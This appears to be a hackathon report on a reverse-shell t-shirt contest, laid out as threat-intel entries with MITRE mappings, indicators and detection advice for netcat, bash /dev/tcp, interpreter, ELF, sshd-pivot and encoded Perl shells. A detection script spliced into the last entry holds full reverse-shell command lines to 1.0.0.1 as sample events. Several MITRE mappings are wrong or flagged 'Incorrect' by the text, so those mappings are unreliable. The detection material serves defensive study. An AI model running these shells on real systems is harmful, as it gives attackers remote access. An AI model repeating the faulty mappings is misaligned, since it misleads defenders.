Full Report
For our internal hackathon, we wanted to produce some shirts. We ran a competition to see who could produce a reverse shell invocation most worthy of inclusion on a shirt. Here are the submissions, which may be instructive or useful. But first, the winning t-shirt design goes to Vlad (-islav, baby don't hurt me, don't hurt me, no more). Funny story: the printer left out the decimal points between the IP octets, so we had to use a permanent marker to put them back. Oh, also, many of these were originally taken from somewhere else and then modified; we don't claim the full idea as our own. Anyway, onto the shells!
Analysis Summary
# Tool/Technique: Netcat Reverse Shell (nc -e)
## Overview
A classic, compact command-line submission for establishing a raw reverse shell connection using `netcat` with the `-e` (execute) option.
## Technical Details
- Type: Tool/Technique
- Platform: Unix-like systems (requires `nc` with `-e` support)
- Capabilities: Establishes a direct shell connection over TCP.
- First Seen: Pre-2012 (as a common technique)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Less accurate, but TCP/IP is the transport)
- T1105 - Ingress Tool Transfer (If Netcat is transferred first, but here it's used for C2)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell
## Functionality
### Core Capabilities
- Execute `/bin/sh` (or similar shell) and redirect its input/output over a TCP connection to a listening host.
### Advanced Features
- Extremely terse invocation (18 characters), making it suitable for constrained injection environments.
## Indicators of Compromise
- File Hashes: N/A (In-memory execution or use of standard binary)
- File Names: `nc` (netcat)
- Registry Keys: N/A
- Network Indicators: TCP connection initiated to `1.0.0.1:8` (Defanged example: `1[.]0[.]0[.]1:8` or specified attacker IP/port).
- Behavioral Indicators: Execution of `nc` with the `-e` flag followed by outgoing network connections.
## Associated Threat Actors
- General penetration testers and hobbyists. (This specific invocation is ubiquitous.)
## Detection Methods
- Signature-based detection: Searching process command lines for `nc -e`.
- Behavioral detection: Monitoring execution of Netcat paired with execution of a shell binary (`sh`, `bash`).
## Mitigation Strategies
- Remove or restrict direct execution of Netcat, especially versions compiled with the `-e` option, which is often disabled in modern builds for security reasons.
- Network filtering to block outbound connections unless explicitly authorized.
## Related Tools/Techniques
- Telnet Reverse Shell (similar methodology, slightly longer command).
---
# Tool/Technique: Bash Reverse Shell (/dev/tcp)
## Overview
A highly popular and compact reverse shell technique utilizing Bash's built-in redirection capabilities to open a connection directly to a remote host via the `/dev/tcp` pseudo-device. This was Vlad's winning submission.
## Technical Details
- Type: Technique
- Platform: Linux/Unix systems running Bash (specifically requiring `/dev/tcp` support, often absent in minimalist deployments like RHEL by default).
- Capabilities: Creates a reliable shell connection using native shell redirection.
- First Seen: Common technique, widely used since Bash supported this feature.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell
## Functionality
### Core Capabilities
- Redirects standard input (0), standard output (1), and standard error (2) through the established TCP sockets to `/dev/tcp/[IP]/[PORT]`.
### Advanced Features
- Native language support minimizes the need for external binaries (like `nc`), often bypassing basic file presence checks.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `bash`
- Registry Keys: N/A
- Network Indicators: Outbound TCP connection to `1.0.0.1:8` (Defanged example: `1[.]0[.]0[.]1:8`).
- Behavioral Indicators: Use of file descriptor redirection (`>&`, `0>&1`) combined with string literals representing network paths.
## Associated Threat Actors
- Widely used by penetration testers and potentially by actors targeting Linux environments where Bash is default.
## Detection Methods
- Signature-based detection: Searching command lines for patterns like `/dev/tcp/` and file descriptor redirection (`0>&1`).
- Behavioral detection: Monitoring for shell processes spawning unexpected, long-lived TCP connections.
## Mitigation Strategies
- Principle of Least Privilege: Restrict service accounts from running Bash if possible.
- Monitor shell history/command execution for suspicious redirection sequences.
## Related Tools/Techniques
- Perl/Python/Ruby shells (Attempting to achieve similar results using different interpreters).
---
# Tool/Technique: Telnet Reverse Shell
## Overview
A technique leveraging the `mkfifo` command to create a named pipe, then piping shell standard I/O through that pipe to a `telnet` connection. This aims for maximum compatibility since `telnet` is often present.
## Technical Details
- Type: Technique
- Platform: Unix-like systems with `mkfifo`, `telnet`, and shell access.
- Capabilities: Establishes a shell session, potentially hiding streams better than direct `nc` execution if pipes abstract the flow.
- First Seen: Common technique exploiting available utilities.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
## Functionality
### Core Capabilities
- Creates a named pipe (`mkfifo x`).
- Connects `telnet` to the C2 server, using file descriptor redirection (`0<x`, `2>&...`) to link the pipe to the shell session over the network connection.
### Advanced Features
- High compatibility across older or minimalist Unix installs where Netcat might be missing. Can substitute `telnet` with `nc` for brevity (33 chars).
## Indicators of Compromise
- File Hashes: N/A
- File Names: `mkfifo`, `telnet`
- Registry Keys: N/A
- Network Indicators: TCP connection to `1.0.0.1:8` (Defanged example: `1[.]0[.]0[.]1:8`).
- Behavioral Indicators: Use of `mkfifo` followed immediately by interaction with a network utility (`telnet`).
## Associated Threat Actors
- Penetration testers focused on tool scarcity.
## Detection Methods
- Monitoring process creation for the `mkfifo` utility being spawned by non-standard parent processes (e.g., a web server process).
## Mitigation Strategies
- Uninstall legacy tools like `telnet` if administrative access is required.
- Monitor for the creation of world-writable named pipes in unexpected locations.
## Related Tools/Techniques
- Netcat Reverse Shell.
---
# Tool/Technique: PHP Reverse Shell
## Overview
A submission utilizing the PHP Command Line Interface (CLI) to create a reverse shell, likely using PHP's stream wrappers for socket communication.
## Technical Details
- Type: Technique
- Platform: Systems with PHP CLI installed.
- Capabilities: Executes shell commands via PHP's stream handling, binding input/output streams to the remote socket.
- First Seen: Common technique for web shell persistence/exploitation.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.006 - Python (Incorrect, but covers scripting environments)
- T1059.009 - Command and Scripting Interpreter (General scripting)
## Functionality
### Core Capabilities
- Uses stream redirection (`&3`, `2>&3`) to link the shell process STDIO streams to the established socket handled by descriptor 3.
### Advanced Features
- Requires PHP CLI to be available and executable.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `php`
- Network Indicators: Inferred TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Execution of `php` passing a command string containing stream manipulation syntax.
## Associated Threat Actors
- Actors exploiting web applications that utilize PHP, pivoting to the CLI.
## Detection Methods
- Monitoring for `php` execution with command-line arguments containing socket/stream configuration syntax.
## Mitigation Strategies
- Remove PHP CLI from production servers where possible.
- Restrict execution context of PHP interpreters.
## Related Tools/Techniques
- Python/Perl shells (Utilizing scripting languages for similar effect).
---
# Tool/Technique: Ruby Reverse Shell
## Overview
A brief Ruby script submission that imports the `socket` library to establish a TCP connection and force execution of the spawned shell process using the connected file descriptor.
## Technical Details
- Type: Technique/Script
- Platform: Systems with Ruby and the `socket` library installed.
- Capabilities: Establishes raw TCP connection and executes a shell, using file descriptor inheritance.
- First Seen: Common technique leveraging Ruby's standard library.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.008 - Python (Incorrect, general scripting interpreter)
## Functionality
### Core Capabilities
- Opens a TCP client socket to the attacker.
- Uses `exec` after mapping STDIN, STDOUT, and STDERR to the socket file descriptor (`f`).
### Advanced Features
- Requires explicit invocation with `ruby -rsocket small-rev.rb`, which may be noted via command-line monitoring.
## Indicators of Compromise
- File Hashes: SHA256 hash of the script file if saved.
- File Names: `ruby`, `small-rev.rb`
- Network Indicators: TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Execution of `ruby` with `-r` switches, followed by network activity and process creation.
## Associated Threat Actors
- Actors leveraging installed Ruby environments.
## Detection Methods
- Monitoring for system calls related to socket creation (`connect`) initiated by the `ruby` interpreter process.
## Mitigation Strategies
- Ensure Ruby environments are patched and only run trusted scripts.
## Related Tools/Techniques
- Python, Perl shells.
---
# Tool/Technique: Python Reverse Shell
## Overview
A verbose, but highly portable Python script designed to establish a reverse shell by using the `socket` module and replacing file descriptors 0, 1, and 2 with the socket connection.
## Technical Details
- Type: Technique/Script
- Platform: Systems with Python installed.
- Capabilities: Highly reliable shell execution by manipulating standard file descriptors (`os.dup2`).
- First Seen: Common technique due to Python's prevalence.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.006 - Python
## Functionality
### Core Capabilities
- Imports `socket` and `os`.
- Creates a TCP socket, connects, and then calls `os.dup2(file_descriptor, 0/1/2)` three times to map STDIN/OUT/ERR to the socket.
- Executes `/bin/sh` using `os.system()`.
### Advanced Features
- Assumes Unix line endings, indicating that it targets specific configurations.
## Indicators of Compromise
- File Hashes: SHA256 hash of the script file if saved.
- File Names: `python`, script filenames.
- Network Indicators: TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Execution of Python connecting to an external, non-standard port followed by an execution of `/bin/sh`.
## Associated Threat Actors
- Nearly all threat actors with scripting capability can use Python.
## Detection Methods
- Monitoring for Python scripts that open outbound TCP sockets and subsequently execute system shells.
## Mitigation Strategies
- Implement strong controls on Python environments, especially concerning raw socket programming and `os.dup2`/`os.system` calls.
## Related Tools/Techniques
- Other interpreter-based shells (Ruby, Perl).
---
# Tool/Technique: Perl Reverse Shell
## Overview
A Perl script intended to establish a reverse shell using fork/exit logic to ensure the process continues, and a socket connection to handle I/O streams.
## Technical Details
- Type: Technique/Script
- Platform: Systems with Perl installed.
- Capabilities: Utilizes Perl's `fork` to background the process and `IO::Socket::INET` for network communication; redirects input/output streams to the socket.
- First Seen: Common technique dating back to early system exploitation.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.005 - Visual Basic (Incorrect, general scripting interpreter)
## Functionality
### Core Capabilities
- Forks the process (`$p=fork; exit,if($p)`).
- Creates socket connection to `1.0.0.1:8`.
- Replaces STDIN and STDOUT with the socket handle allowing interactive commands/output.
### Advanced Features
- The use of `fork` separates the connection from the parent interpreter invocation.
## Indicators of Compromise
- File Hashes: SHA256 hash of the script file if saved.
- File Names: `perl`, `small-rev.pl`
- Network Indicators: TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Process creation resulting in a forked child process that establishes a socket and then executes a shell loop via `<>`.
## Associated Threat Actors
- Actors exploiting environments where Perl is installed, common in legacy or older Unix systems.
## Detection Methods
- Monitoring for system calls related to `fork()` occurring within Perl processes that are also making external network connections.
## Mitigation Strategies
- Minimize the use and deployment of Perl on critical infrastructure.
## Related Tools/Techniques
- Python, PHP shells.
---
# Tool/Technique: ELF Executable Reverse Shell
## Overview
A submission that uses a custom-compiled ELF binary specifically designed to act as a reverse shell, utilizing hardcoded offsets and raw assembly/data structures.
## Technical Details
- Type: Malware/Tool (Specifically, a custom binary)
- Platform: Linux systems supporting ELF executables.
- Capabilities: Bypasses scripting engine monitoring by executing compiled code directly.
- First Seen: Context implies this was custom-made for the competition.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1204 - User Execution (If downloaded and run)
- T1027 - Obfuscated Files or Information (Due to binary nature filling space)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
## Functionality
### Core Capabilities
- Establishes a hardcoded connection to `127.0.0.1:8080` (deviation noted from other shells).
- Executes system functionality internally (likely via syscalls for socket creation and execution).
### Advanced Features
- Extremely difficult to analyze without reverse engineering the binary content.
- Character count (133 chars) is misleading as it represents the binary's encoded or raw form, not source code length.
## Indicators of Compromise
- File Hashes: High probability of unique hashes for this specific binary.
- File Names: Generic names or names obfuscated from the binary data.
- Network Indicators: TCP connection to `127.0.0.1:8080` (Defang: `127[.]0[.]0[.]1:8080`).
- Behavioral Indicators: Unexpected execution of a binary with suspicious network activity originating from an unusual location.
## Associated Threat Actors
- Malware developers, advanced attackers who compile custom payloads.
## Detection Methods
- File scanning for suspicious binary patterns (e.g., ELF headers followed by shellcode/data indicative of network connections).
## Mitigation Strategies
- Strict execution control (e.g., AppLocker, constrained execution policies).
- Enhanced endpoint detection looking for abnormal syscall patterns.
## Related Tools/Techniques
- Custom backdoors written in C/C++.
---
# Tool/Technique: Usermode SSHD Pivot Shell
## Overview
A multi-step technique using standard Linux utilities (`ssh-keygen`, `bash`, `ssh`) to establish a persistent reverse connection configured to act as a local SSH daemon on the victim. This method prioritizes functionality (pivoting, port forwarding) over byte count minimization.
## Technical Details
- Type: Technique
- Platform: Unix-like systems with OpenSSH utilities installed.
- Capabilities: Establishes a legitimate-looking SSH listener on the target machine, using SSH keys for authentication, allowing for complex pivoting via SSH tunnels.
- First Seen: Known technique leveraging standard system administration tools for post-exploitation persistence and pivoting.
## MITRE ATT&CK Mapping
- TA0003 - Persistence
- T1548.002 - Bypass User Account Control (If run under compromised user context)
- TA0010 - Lateral Movement
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol (Analogous use of remote access)
- TA0011 - Command and Control
- T1105 - Ingress Tool Transfer (If system binaries are used)
## Functionality
### Core Capabilities
- Generates a new RSA key pair (`sshd_rsa`).
- Creates a user `.ssh` directory.
- Creates an `authorized_keys` file containing the attacker's public key (implied, as the command structure sets up the listener).
- Starts a local SSH daemon (`sshd`) instance on a specified port (implicitly port 8 unless another port is chosen; the command sample implies it binds a new listening service).
- *Note: The article implies the reverse shell capability is achieved via pivoting/forwarding capabilities of this SSH listener, rather than a direct execution of a shell.*
### Advanced Features
- Utilizes trusted system binaries, often evading simple application whitelisting.
- Provides full SSH tunnel and port forwarding capabilities on the compromised host without needing to upload a third-party backdoor service.
## Indicators of Compromise
- File Hashes: N/A for the technique itself, but hashes of generated keys might be relevant if stored.
- File Names: `ssh-keygen`, `/tmp/sshd_rsa`, `/home/user/.ssh/authorized_keys`.
- Registry Keys: N/A
- Network Indicators: Outbound connection, *or* an unexpected local service listening on a high port (if the attacker connects back immediately).
- Behavioral Indicators: Spawning of `/usr/bin/sshd` without standard configuration paths or unusual startup behavior.
## Associated Threat Actors
- Sophisticated attackers focusing on maintaining network access (C2) and internal system pivoting.
## Detection Methods
- Monitoring for standard users executing `ssh-keygen` outside of deployment pipelines, especially creating temporary key files in `/tmp`.
- Network monitoring for dynamic local services spawning via user context.
## Mitigation Strategies
- Restrict user privileges to prevent running system services like `sshd`.
- System hardening to ensure SSH keys are managed centrally and not locally generated by end-users for unexpected connectivity.
## Related Tools/Techniques
- Using SMB/HTTP for C2 if SSH is unavailable.
---
# Tool/Technique: Encoded Perl Reverse Shell
## Overview
A modification of the standard Perl reverse shell that heavily relies on the `pack` command to encode the actual shell command (a Bash `/dev/tcp` shell) into hexadecimal strings. This technique is designed to bypass simple injection filter checks that might flag direct shell syntax characters.
## Technical Details
- Type: Technique/Script (Encoded Payload)
- Platform: Systems with Perl installed.
- Capabilities: Payload encoding via hex conversion to evade detection/injection limits, followed by dynamic decoding (`pack`) at runtime.
- First Seen: Technique common in obfuscated shellcode/payload delivery.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1027 - Obfuscated Files or Information
- T1027.001 - Code Signing Certificates (Not applicable, but related to relying on execution context)
- T1059 - Command and Scripting Interpreter (Perl)
## Functionality
### Core Capabilities
- The core payload is the Bash `/dev/tcp` shell.
- This payload is represented as hexadecimal characters (e.g., `65786563...`).
- The command `pack qw.H..chr(42)...` decodes these hex segments back into executable bytes/characters, reassembling the shell command.
### Advanced Features
- Uses Perl's `qw...` feature combined with hex representation to avoid problematic characters during injection.
- Designed to work around small input buffers by chunking the payload.
## Indicators of Compromise
- File Hashes: Unique hashes based on the specific hex chunks used.
- File Names: Generic names or those used during initial small injection.
- Network Indicators: TCP connection upon successful decoding and execution (likely targeting `1.0.0.1:808` or port 8080, as inferred from binary context).
- Behavioral Indicators: Execution of `perl` with excessive command-line arguments containing long hex strings, immediately followed by a network connection.
## Associated Threat Actors
- Actors utilizing sophisticated web exploits where input length or character sets are severely restricted.
## Detection Methods
- Heuristic analysis of Perl command lines, flagging excessive arguments composed entirely of hexadecimal characters intended for use with `pack` or `unpack`.
## Mitigation Strategies
- Strict input validation on application injection points that receive data intended for execution interpreters.
## Related Tools/Techniques
- Base64 or other encoding schemes used in PowerShell or Python obfuscation.
---
# Tool/Technique: Python PTY Shell Upgrade
## Overview
A technique that uses a Netcat connection (already established, perhaps unstably or without TTY features) and then leverages the Python `pty` module to spawn a fully interactive pseudo-terminal (PTY) shell.
## Technical Details
- Type: Technique
- Platform: Unix-like systems with Python installed.
- Capabilities: Upgrades a basic non-interactive shell connection (like one from basic Netcat) into a stable, interactive PTY, providing features like command history, line editing, and proper terminal control characters.
- First Seen: Standard post-exploitation technique for stabilizing shells popularized around 2012-2014.
## MITRE ATT&CK Mapping
- TA0008 - Lateral Movement (Can be used to stabilize access for further action)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP, used by the initial Netcat shell)
## Functionality
### Core Capabilities
- The initial step is receiving shell input via `nc` on port 80 (or another specified port).
- The Python payload then calls `pty.spawn("/bin/bash")` to remap the socket I/O to a fully functional PTY session bound to `/bin/bash`.
### Advanced Features
- Solves the common problem of handling control characters and buffer issues associated with direct C/Ncat shells.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `python`, `nc`
- Network Indicators: Initial connection often to port 80 or 443 (if masqueraded), followed by stable terminal session behavior.
- Behavioral Indicators: Execution of Python importing the `pty` module immediately after a network connection has been established to the controlling process.
## Associated Threat Actors
- Any actor maintaining shell access post-compromise who requires interactive functionality.
## Detection Methods
- Monitoring for Python execution alongside calls to kernel functions related to pseudo-terminal allocation (`openpty`, `forkpty`).
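Detection logic for the behavioural indicators listed in the Detection Methods sections above (netcat `-e`, `/dev/tcp` redirection, `mkfifo` under a web-server parent, the interpreter-based shells, the hex-encoded Perl payload and the `pty` upgrade), as an added example that is not part of the original post. The event format, the parent-process list and the sample events are constructed, not taken from a real EDR feed.

```python
"""Flag reverse-shell invocations in process-creation events.

Added example for this report; not from the original post. Rules mirror the
behavioural indicators listed above. Event format (constructed): dicts with
'parent', 'comm' and 'cmdline' keys, as an enriched auditd/EDR pipeline
might emit.
"""
import re
from typing import Dict, List

# Every regex in a rule must match the command line for the rule to fire.
RULES: Dict[str, List[str]] = {
    "netcat -e reverse shell": [r"\b(nc|ncat|netcat)\b", r"\s-[A-Za-z]*e\b"],
    "bash /dev/tcp reverse shell": [r"/dev/tcp/", r"[0-2]>&[0-2]"],
    "mkfifo piped to network utility": [r"\bmkfifo\b", r"\b(telnet|nc|ncat)\b"],
    "php stream reverse shell": [r"\bphp\b", r"(socket|stream)", r"&3\b"],
    "ruby -rsocket reverse shell": [r"\bruby\b", r"-rsocket\b", r"\bexec\b"],
    "python dup2 reverse shell": [r"\bpython[0-9.]*\b", r"\bsocket\b", r"dup2", r"/bin/(ba)?sh"],
    "perl fork+IO::Socket shell": [r"\bperl\b", r"IO::Socket::INET", r"\bfork\b"],
    "encoded perl pack payload": [r"\bperl\b", r"\bpack\b", r"[0-9a-fA-F]{16,}"],
    "python pty shell upgrade": [r"\bpython[0-9.]*\b", r"\bpty\b", r"spawn\("],
}
COMPILED = {name: [re.compile(p) for p in pats] for name, pats in RULES.items()}
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}  # constructed list


def classify(event: Dict[str, str]) -> List[str]:
    """Return the name of every rule that fires for one process event."""
    cmd = event["cmdline"]
    hits = [name for name, pats in COMPILED.items() if all(p.search(cmd) for p in pats)]
    # The pipe creation and the network utility may be separate processes, so
    # also alert on parent context alone: a web server rarely spawns mkfifo.
    if event["comm"] == "mkfifo" and event["parent"] in WEB_PARENTS:
        hits.append("mkfifo spawned by web server parent")
    return hits


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Produce one alert line per rule hit across a batch of events."""
    alerts = []
    for ev in events:
        for name in classify(ev):
            alerts.append(f"[{name}] parent={ev['parent']} comm={ev['comm']}: {ev['cmdline']}")
    return alerts


# Constructed sample events: the malicious ones reuse only syntax already
# described in this report; the benign ones exercise the false-positive path.
SAMPLE_EVENTS = [
    {"parent": "apache2", "comm": "sh", "cmdline": "sh -c 'nc -e /bin/sh 1.0.0.1 8'"},
    {"parent": "sshd", "comm": "bash", "cmdline": "bash -i >& /dev/tcp/1.0.0.1/8 0>&1"},
    {"parent": "php-fpm", "comm": "mkfifo", "cmdline": "mkfifo x"},
    {"parent": "nc", "comm": "python3", "cmdline": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"parent": "cron", "comm": "nc", "cmdline": "nc -zv db.internal 5432"},  # port probe, no -e
    {"parent": "bash", "comm": "python3", "cmdline": "python3 -c 'import socket; print(socket.gethostname())'"},
    {"parent": "make", "comm": "mkfifo", "cmdline": "mkfifo build/fifo"},  # build script
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

Command-line matching is only the signature layer of the indicators above; the behavioural ones (a shell process holding a long-lived outbound TCP socket) need process and network telemetry joined on PID.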
## Mitigation Strategies
- Restrict Python execution unless explicitly required and monitored.
- Ensure necessary modules for TTY spawning are unavailable in secure contexts.
## Related Tools/Techniques
- Python upgrade scripts using `socat`.